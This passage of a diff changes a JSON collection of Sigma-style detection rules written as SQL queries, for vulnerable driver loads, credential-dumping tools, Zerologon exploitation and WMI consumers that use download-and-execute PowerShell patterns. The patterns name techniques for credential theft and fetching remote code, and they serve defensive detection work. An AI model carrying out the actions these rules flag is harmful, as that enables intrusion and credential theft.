'3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b')))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", + "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" + ], + "falsepositives": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + ], + "filename": "driver_load_win_mal_poortry_driver.yml" + }, + { + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ @@ -2647,214 +2613,196 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - 